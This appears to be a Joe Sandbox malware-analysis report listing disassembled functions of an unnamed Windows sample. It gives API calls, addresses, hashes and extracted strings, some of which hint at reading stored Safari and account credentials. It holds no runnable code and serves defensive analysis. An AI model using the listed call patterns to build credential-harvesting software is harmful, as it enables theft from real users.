                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 609303285-0
                                                                                                                                                                                                                              • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2081463915-0
                                                                                                                                                                                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2136311172-0
                                                                                                                                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@??3@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1936579350-0
                                                                                                                                                                                                                              • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3604893535-0
                                                                                                                                                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1213725291-0
                                                                                                                                                                                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                              • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                              • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                              • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Version
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1889659487-0
                                                                                                                                                                                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                              • API String ID: 577499730-1134094380
                                                                                                                                                                                                                              • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                              • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                              • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                              • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 829165378-0
                                                                                                                                                                                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00404172
